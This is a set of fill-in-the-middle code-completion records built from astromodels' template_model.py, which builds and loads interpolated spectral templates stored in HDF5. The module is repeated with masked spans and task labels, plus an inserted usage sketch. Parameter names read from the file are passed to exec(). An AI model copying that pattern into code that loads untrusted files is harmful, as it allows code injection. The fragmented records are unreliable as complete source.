self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now substitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join(parameters.keys()),
",".join(par_names_no_K_no_scale))
exec(function_code)
add_method(self, new_evaluate,'_evaluate')
self.evaluate = self._evaluate
def _prepare_interpolators(self):
# Figure out the shape of the data matrices
data_shape = map(lambda x: x.shape[0], self._parameters_grids.values())
self._interpolators = []
for energy in self._energies:
# Make interpolator for this energy
# NOTE: we interpolate on the logarithm
this_data = np.array(np.log10(self._data_frame[energy].values).reshape(*data_shape), dtype=float)
if len(self._parameters_grids.values()) == 2:
x, y = self._parameters_grids.values()
# Make sure that the requested polynomial degree is less than the number of data sets in
# both directions
msg = "You cannot use an interpolation degree of %s if you don't provide at least %s points " \
"in the %s direction. Increase the number of templates or decrease the interpolation " \
"degree."
if len(x) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree+1, 'x'))
if len(y) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree + 1, 'y'))
this_interpolator = RectBivariateSplineWrapper(x, y, this_data,
kx=self._interpolation_degree,
ky=self._interpolation_degree,
s=self._spline_smoothing_factor)
else:
# In more than 2d we can only use linear interpolation
this_interpolator = scipy.interpolate.RegularGridInterpolator(self._parameters_grids.values(),
this_data)
self._interpolators.append(this_interpolator)
def _set_units(self, x_unit, y_unit):
|
# This function will be substituted during construction by another version with
# all the parameters of this template
def evaluate(self, x, K, scale):
# This is overridden in the constructor
raise NotImplementedError("Should not get here!")
def _interpolate(self, energies, scale, parameters_values):
if isinstance(energies, u.Quantity):
# Templates are always saved with energy in keV. We need to transform it to
# a dimensionless quantity (actually we take the .value property) because otherwise
# the logarithm below will fail.
energies = np.array(energies.to('keV').value, ndmin=1, copy=False, dtype=float)
# Same for the scale
scale = scale.to(1 / u.keV).value
log_energies = np.log10(energies)
e_tilde = self._energies * scale
# Gather all interpolations for these parameters' values at all defined energies
# (these are the logarithm of the values)
log_interpolations = np.array(map(lambda i:self._interpolators[i](parameters_values),
range(self._energies.shape[0])))
# Now interpolate the interpolations to get the flux at the requested energies
# NOTE: the variable "interpolations" contains already the log10 of the values,
interpolator = scipy.interpolate.InterpolatedUnivariateSpline(np.log10(e_tilde),
log_interpolations,
k=self._interpolation_degree,
ext=0)
values = np.power(10, interpolator(log_energies))
# The division by scale results from the differential:
# E = e * scale
# de = dE / scale
# dN / dE = dN / de * de / dE = dN / de * (1 / scale)
# NOTE: the units are added back through the multiplication by K in the evaluate method
return values / scale
def to_dict(self, minimal=False):
data = super(Function1D, self).to_dict(minimal)
if not minimal:
data['extra_setup'] = {'data_file': self._data_file}
return data
| self.K.unit = y_unit
self.scale.unit = 1 / x_unit | identifier_body |
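template_model.py defines the factory and the runtime model but never shows them being driven end to end. The sketch below illustrates the intended call order (define every parameter grid, fill every grid point, save, then reload by name). The parameter names, grid values and the cutoff power-law fluxes are invented for illustration; only the method signatures come from the classes above. Note that save_data() writes an HDF5 file into the astromodels user data directory.

import numpy as np
import astropy.units as u
# TemplateModelFactory and TemplateModel are the classes defined above.

energies = np.logspace(1, 3, 50) * u.keV
index_grid = np.linspace(-3.0, -1.0, 5)
cutoff_grid = np.logspace(2, 3, 4)

factory = TemplateModelFactory('illustrative_template', 'a toy cutoff power law',
                               energies, ['index', 'cutoff'])
factory.define_parameter_grid('index', index_grid)
factory.define_parameter_grid('cutoff', cutoff_grid)

# Every combination of grid values must be filled, otherwise save_data() refuses
# to write the file (the data frame would still contain NaNs).
for index in index_grid:
    for cutoff in cutoff_grid:
        fluxes = (energies.value ** index *
                  np.exp(-energies.value / cutoff)) / (u.keV * u.s * u.cm ** 2)
        factory.add_interpolation_data(fluxes, index=index, cutoff=cutoff)

factory.save_data(overwrite=True)

# The stored grid can now be loaded back by name as a spectral function.
template = TemplateModel('illustrative_template')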
template_model.py | from astromodels.functions.function import Function1D, FunctionMeta
from astromodels.utils.configuration import get_user_data_path
import collections
from astromodels.parameter import Parameter
import numpy as np
import pandas as pd
from pandas import HDFStore
import scipy.interpolate
import os
import re
import warnings
import astropy.units as u
class IncompleteGrid(RuntimeError):
pass
class ValuesNotInGrid(ValueError):
pass
class MissingDataFile(RuntimeError):
pass
class TemplateModelFactory(object):
def __init__(self, name, description, energies, names_of_parameters,
interpolation_degree=1, spline_smoothing_factor=0):
# Store model name
# Enforce that it does not contain spaces nor strange characters
name = str(name)
if re.match("[a-zA-Z_][a-zA-Z0-9_]*", name) is None:
raise RuntimeError("The provided name '%s' is not a valid name. You cannot use spaces, "
"or special characters" % name)
self._name = name
self._description = str(description)
# Store energy grid
if not isinstance(energies, u.Quantity):
warnings.warn("Energy unit is not a Quantity instance, so no unit has been provided. Using keV.")
energies = energies * u.keV
self._energies = np.array(energies.to(u.keV).value)
# Enforce that they are ordered
self._energies.sort()
# We create a dictionary which will contain the grid for each parameter
self._parameters_grids = collections.OrderedDict()
for parameter_name in names_of_parameters:
self._parameters_grids[parameter_name] = None
self._data_frame = None
self._multi_index = None
self._interpolators = None
self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
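# Illustrative layout, assuming two hypothetical parameters "index" and "cutoff" (not defined here):
# rows are indexed by tuples of grid values such as (index, cutoff), there is one column per
# energy (in keV), and each cell holds the differential flux for that grid point.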
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exist already
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reason the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def | (self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method that accepts the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We use scipy's RectBivariateSpline, which provides spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contain the fluxes
at x / scale. This is useful for example when the template describes energies in the rest frame,
at which point the scale describes the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now substitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join(parameters.keys()),
",".join(par_names_no_K_no_scale))
exec(function_code)
add_method(self, new_evaluate,'_evaluate')
self.evaluate = self._evaluate
def _prepare_interpolators(self):
# Figure out the shape of the data matrices
data_shape = map(lambda x: x.shape[0], self._parameters_grids.values())
self._interpolators = []
for energy in self._energies:
# Make interpolator for this energy
# NOTE: we interpolate on the logarithm
this_data = np.array(np.log10(self._data_frame[energy].values).reshape(*data_shape), dtype=float)
if len(self._parameters_grids.values()) == 2:
x, y = self._parameters_grids.values()
# Make sure that the requested polynomial degree is less than the number of data sets in
# both directions
msg = "You cannot use an interpolation degree of %s if you don't provide at least %s points " \
"in the %s direction. Increase the number of templates or decrease the interpolation " \
"degree."
if len(x) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree+1, 'x'))
if len(y) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree + 1, 'y'))
this_interpolator = RectBivariateSplineWrapper(x, y, this_data,
kx=self._interpolation_degree,
ky=self._interpolation_degree,
s=self._spline_smoothing_factor)
else:
# In more than 2d we can only use linear interpolation
this_interpolator = scipy.interpolate.RegularGridInterpolator(self._parameters_grids.values(),
this_data)
self._interpolators.append(this_interpolator)
def _set_units(self, x_unit, y_unit):
self.K.unit = y_unit
self.scale.unit = 1 / x_unit
# This function will be substituted during construction by another version with
# all the parameters of this template
def evaluate(self, x, K, scale):
# This is overridden in the constructor
raise NotImplementedError("Should not get here!")
def _interpolate(self, energies, scale, parameters_values):
if isinstance(energies, u.Quantity):
# Templates are always saved with energy in keV. We need to transform it to
# a dimensionless quantity (actually we take the .value property) because otherwise
# the logarithm below will fail.
energies = np.array(energies.to('keV').value, ndmin=1, copy=False, dtype=float)
# Same for the scale
scale = scale.to(1 / u.keV).value
log_energies = np.log10(energies)
e_tilde = self._energies * scale
# Gather all interpolations for these parameters' values at all defined energies
# (these are the logarithm of the values)
log_interpolations = np.array(map(lambda i:self._interpolators[i](parameters_values),
range(self._energies.shape[0])))
# Now interpolate the interpolations to get the flux at the requested energies
# NOTE: the variable "interpolations" contains already the log10 of the values,
interpolator = scipy.interpolate.InterpolatedUnivariateSpline(np.log10(e_tilde),
log_interpolations,
k=self._interpolation_degree,
ext=0)
values = np.power(10, interpolator(log_energies))
# The division by scale results from the differential:
# E = e * scale
# de = dE / scale
# dN / dE = dN / de * de / dE = dN / de * (1 / scale)
# NOTE: the units are added back through the multiplication by K in the evaluate method
return values / scale
def to_dict(self, minimal=False):
data = super(Function1D, self).to_dict(minimal)
if not minimal:
data['extra_setup'] = {'data_file': self._data_file}
return data
| add_method | identifier_name |
template_model.py | from astromodels.functions.function import Function1D, FunctionMeta
from astromodels.utils.configuration import get_user_data_path
import collections
from astromodels.parameter import Parameter
import numpy as np
import pandas as pd
from pandas import HDFStore
import scipy.interpolate
import os
import re
import warnings
import astropy.units as u
class IncompleteGrid(RuntimeError):
pass
class ValuesNotInGrid(ValueError):
pass
class MissingDataFile(RuntimeError):
pass
class TemplateModelFactory(object):
def __init__(self, name, description, energies, names_of_parameters,
interpolation_degree=1, spline_smoothing_factor=0):
# Store model name
# Enforce that it does not contain spaces nor strange characters
name = str(name)
if re.match("[a-zA-Z_][a-zA-Z0-9_]*", name) is None:
raise RuntimeError("The provided name '%s' is not a valid name. You cannot use spaces, "
"or special characters")
self._name = name
self._description = str(description)
# Store energy grid
if not isinstance(energies, u.Quantity):
warnings.warn("Energy unit is not a Quantity instance, so units has not been provided. Using keV.")
energies = energies * u.keV
self._energies = np.array(energies.to(u.keV).value)
# Enforce that they are ordered
self._energies.sort()
# We create a dictionary which will contain the grid for each parameter
self._parameters_grids = collections.OrderedDict()
for parameter_name in names_of_parameters:
self._parameters_grids[parameter_name] = None
self._data_frame = None
self._multi_index = None
self._interpolators = None
self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
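# Illustrative layout, assuming two hypothetical parameters "index" and "cutoff" (not defined here):
# rows are indexed by tuples of grid values such as (index, cutoff), there is one column per
# energy (in keV), and each cell holds the differential flux for that grid point.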
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exist already
if os.path.exists(filename_sanitized):
if overwrite:
|
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reason the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
class RectBivariateSplineWrapper(object):
"""
Wrapper around RectBivariateSpline, which supplies a __call__ method that accepts the same
syntax as the other interpolation methods
"""
def __init__(self, *args, **kwargs):
# We use scipy's RectBivariateSpline, which provides spline interpolation instead of linear interpolation
self._interpolator = scipy.interpolate.RectBivariateSpline(*args, **kwargs)
def __call__(self, x):
res = self._interpolator(*x)
return res[0][0]
class TemplateModel(Function1D):
r"""
description :
A template model
latex : $n.a.$
parameters :
K :
desc : Normalization (freeze this to 1 if the template provides the normalization by itself)
initial value : 1.0
scale :
desc : Scale for the independent variable. The templates are handled as if they contain the fluxes
at x / scale. This is useful for example when the template describes energies in the rest frame,
at which point the scale describes the transformation between rest frame energy and observer frame
energy. Fix this to 1 to neutralize its effect.
initial value : 1.0
min : 1e-5
"""
__metaclass__ = FunctionMeta
def _custom_init_(self, model_name):
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % model_name))
if not os.path.exists(filename_sanitized):
raise MissingDataFile("The data file %s does not exists. Did you use the "
"TemplateFactory?" % (filename_sanitized))
# Open the template definition and read from it
self._data_file = filename_sanitized
with HDFStore(filename_sanitized) as store:
self._data_frame = store['data_frame']
self._parameters_grids = collections.OrderedDict()
processed_parameters = 0
for key in store.keys():
match = re.search('p_([0-9]+)_(.+)', key)
if match is None:
continue
else:
tokens = match.groups()
this_parameter_number = int(tokens[0])
this_parameter_name = str(tokens[1])
assert this_parameter_number == processed_parameters, "Parameters out of order!"
self._parameters_grids[this_parameter_name] = store[key]
processed_parameters += 1
self._energies = store['energies']
# Now get the metadata
metadata = store.get_storer('data_frame').attrs.metadata
description = metadata['description']
name = metadata['name']
self._interpolation_degree = metadata['interpolation_degree']
self._spline_smoothing_factor = metadata['spline_smoothing_factor']
# Make the dictionary of parameters
function_definition = collections.OrderedDict()
function_definition['description'] = description
function_definition['latex'] = 'n.a.'
# Now build the parameters according to the content of the parameter grid
parameters = collections.OrderedDict()
parameters['K'] = Parameter('K', 1.0)
parameters['scale'] = Parameter('scale', 1.0)
for parameter_name in self._parameters_grids.keys():
grid = self._parameters_grids[parameter_name]
parameters[parameter_name] = Parameter(parameter_name, grid.median(),
min_value=grid.min(),
max_value=grid.max())
super(TemplateModel, self).__init__(name, function_definition, parameters)
self._prepare_interpolators()
# Now substitute the evaluate function with a version with all the required parameters
# Get the parameters' names (except for K and scale)
par_names_no_K_no_scale = parameters.keys()[2:]
function_code = 'def new_evaluate(self, x, %s): ' \
'return K * self._interpolate(x, scale, [%s])' % (",".join(parameters.keys()),
",".join(par_names_no_K_no_scale))
exec(function_code)
add_method(self, new_evaluate,'_evaluate')
self.evaluate = self._evaluate
def _prepare_interpolators(self):
# Figure out the shape of the data matrices
data_shape = map(lambda x: x.shape[0], self._parameters_grids.values())
self._interpolators = []
for energy in self._energies:
# Make interpolator for this energy
# NOTE: we interpolate on the logarithm
this_data = np.array(np.log10(self._data_frame[energy].values).reshape(*data_shape), dtype=float)
if len(self._parameters_grids.values()) == 2:
x, y = self._parameters_grids.values()
# Make sure that the requested polynomial degree is less than the number of data sets in
# both directions
msg = "You cannot use an interpolation degree of %s if you don't provide at least %s points " \
"in the %s direction. Increase the number of templates or decrease the interpolation " \
"degree."
if len(x) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree+1, 'x'))
if len(y) <= self._interpolation_degree:
raise RuntimeError(msg % (self._interpolation_degree, self._interpolation_degree + 1, 'y'))
this_interpolator = RectBivariateSplineWrapper(x, y, this_data,
kx=self._interpolation_degree,
ky=self._interpolation_degree,
s=self._spline_smoothing_factor)
else:
# In more than 2d we can only use linear interpolation
this_interpolator = scipy.interpolate.RegularGridInterpolator(self._parameters_grids.values(),
this_data)
self._interpolators.append(this_interpolator)
def _set_units(self, x_unit, y_unit):
self.K.unit = y_unit
self.scale.unit = 1 / x_unit
# This function will be substituted during construction by another version with
# all the parameters of this template
def evaluate(self, x, K, scale):
# This is overridden in the constructor
raise NotImplementedError("Should not get here!")
def _interpolate(self, energies, scale, parameters_values):
if isinstance(energies, u.Quantity):
# Templates are always saved with energy in keV. We need to transform it to
# a dimensionless quantity (actually we take the .value property) because otherwise
# the logarithm below will fail.
energies = np.array(energies.to('keV').value, ndmin=1, copy=False, dtype=float)
# Same for the scale
scale = scale.to(1 / u.keV).value
log_energies = np.log10(energies)
e_tilde = self._energies * scale
# Gather all interpolations for these parameters' values at all defined energies
# (these are the logarithm of the values)
log_interpolations = np.array(map(lambda i:self._interpolators[i](parameters_values),
range(self._energies.shape[0])))
# Now interpolate the interpolations to get the flux at the requested energies
# NOTE: the variable "interpolations" contains already the log10 of the values,
interpolator = scipy.interpolate.InterpolatedUnivariateSpline(np.log10(e_tilde),
log_interpolations,
k=self._interpolation_degree,
ext=0)
values = np.power(10, interpolator(log_energies))
# The division by scale results from the differential:
# E = e * scale
# de = dE / scale
# dN / dE = dN / de * de / dE = dN / de * (1 / scale)
# NOTE: the units are added back through the multiplication by K in the evaluate method
return values / scale
def to_dict(self, minimal=False):
data = super(Function1D, self).to_dict(minimal)
if not minimal:
data['extra_setup'] = {'data_file': self._data_file}
return data
| try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized) | conditional_block |
template_model.py | from astromodels.functions.function import Function1D, FunctionMeta
from astromodels.utils.configuration import get_user_data_path
import collections
from astromodels.parameter import Parameter
import numpy as np
import pandas as pd
from pandas import HDFStore
import scipy.interpolate
import os
import re
import warnings
import astropy.units as u
class IncompleteGrid(RuntimeError):
pass
class ValuesNotInGrid(ValueError):
pass
class MissingDataFile(RuntimeError):
pass
class TemplateModelFactory(object):
def __init__(self, name, description, energies, names_of_parameters,
interpolation_degree=1, spline_smoothing_factor=0):
# Store model name
# Enforce that it does not contain spaces nor strange characters
name = str(name)
if re.match("[a-zA-Z_][a-zA-Z0-9_]*", name) is None:
raise RuntimeError("The provided name '%s' is not a valid name. You cannot use spaces, "
"or special characters")
self._name = name
self._description = str(description)
# Store energy grid
if not isinstance(energies, u.Quantity):
warnings.warn("Energy unit is not a Quantity instance, so units has not been provided. Using keV.")
energies = energies * u.keV
self._energies = np.array(energies.to(u.keV).value)
# Enforce that they are ordered
self._energies.sort()
# We create a dictionary which will contain the grid for each parameter
self._parameters_grids = collections.OrderedDict()
for parameter_name in names_of_parameters:
self._parameters_grids[parameter_name] = None
self._data_frame = None
self._multi_index = None
self._interpolators = None
self._interpolation_degree = interpolation_degree
self._spline_smoothing_factor = int(spline_smoothing_factor)
def define_parameter_grid(self, parameter_name, grid):
assert parameter_name in self._parameters_grids, "Parameter %s is not part of this model" % parameter_name
grid_ = np.array(grid)
assert grid_.shape[0] > 1, "A grid for a parameter must contain at least two elements"
# Assert that elements are unique
assert np.all(np.unique(grid_) == grid_), "Non-unique elements in grid for parameter %s" % parameter_name
self._parameters_grids[parameter_name] = grid_
def add_interpolation_data(self, differential_fluxes, **parameters_values_input):
# Verify that the grid has been defined for all parameters
for grid in self._parameters_grids.values():
if grid is None:
raise IncompleteGrid("You need to define a grid for all parameters, by using the "
"define_parameter_grid method.")
if self._data_frame is None:
# This is the first data set, create the data frame
# Create the multi-index
self._multi_index = pd.MultiIndex.from_product(self._parameters_grids.values(),
names=self._parameters_grids.keys())
# Pre-fill the data matrix with nans, so we will know if some elements have not been filled
self._data_frame = pd.DataFrame(index=self._multi_index, columns=self._energies)
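# Illustrative layout, assuming two hypothetical parameters "index" and "cutoff" (not defined here):
# rows are indexed by tuples of grid values such as (index, cutoff), there is one column per
# energy (in keV), and each cell holds the differential flux for that grid point.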
# Make sure we have all parameters and order the values in the same way as the dictionary
parameters_values = np.zeros(len(self._parameters_grids)) * np.nan
for key in parameters_values_input:
assert key in self._parameters_grids, "Parameter %s is not known" % key
idx = self._parameters_grids.keys().index(key)
parameters_values[idx] = parameters_values_input[key]
# If the user did not specify one of the parameters, then the parameters_values array will contain nan
assert np.all(np.isfinite(parameters_values)), "You didn't specify all parameters' values."
# Make sure we are dealing with arrays (list will be transformed)
if not isinstance(differential_fluxes, u.Quantity):
differential_fluxes = differential_fluxes * 1/(u.keV*u.s*u.cm**2)
differential_fluxes = np.array(differential_fluxes.to(1/(u.keV*u.s*u.cm**2)).value)
n_parameters = parameters_values.shape[0]
assert self._energies.shape[0] == differential_fluxes.shape[0], "Differential fluxes and energies must have " \
"the same number of elements"
# Now set the corresponding values in the data frame
try:
self._data_frame.loc[tuple(parameters_values)] = pd.to_numeric(differential_fluxes)
except KeyError:
raise ValuesNotInGrid("The provided parameter values (%s) are not in the defined grid" % parameters_values)
@staticmethod
def _clean_cols_for_hdf(data):
types = data.apply(lambda x: pd.lib.infer_dtype(x.values))
for col in types.index:
data[col] = pd.to_numeric(data[col])
return data
def save_data(self, overwrite=False):
# First make sure that the whole data matrix has been filled
assert not self._data_frame.isnull().values.any(), "You have NaNs in the data matrix. Usually this means " \
"that you didn't fill it up completely, or that some of " \
"your data contains nans. Cannot save the file."
# Get the data directory
data_dir_path = get_user_data_path()
# Sanitize the data file
filename_sanitized = os.path.abspath(os.path.join(data_dir_path, '%s.h5' % self._name))
# Check that it does not exist already
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError("The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized)
else:
raise IOError("The file %s already exists! You cannot call two different "
"template models with the same name" % filename_sanitized)
# Open the HDF5 file and write objects
with HDFStore(filename_sanitized) as store:
# The _clean_cols_for_hdf is needed because for some reason the format of some columns
# is not accepted by .to_hdf otherwise
self._clean_cols_for_hdf(self._data_frame).to_hdf(store, 'data_frame')
store.get_storer('data_frame').attrs.metadata = {'description': self._description,
'name': self._name,
'interpolation_degree': int(self._interpolation_degree),
'spline_smoothing_factor': self._spline_smoothing_factor
}
for i, parameter_name in enumerate(self._parameters_grids.keys()):
store['p_%i_%s' % (i, parameter_name)] = pd.Series(self._parameters_grids[parameter_name])
store['energies'] = pd.Series(self._energies)
# This adds a method to a class at runtime
def add_method(self, method, name=None):
if name is None:
name = method.func_name
setattr(self.__class__, name, method)
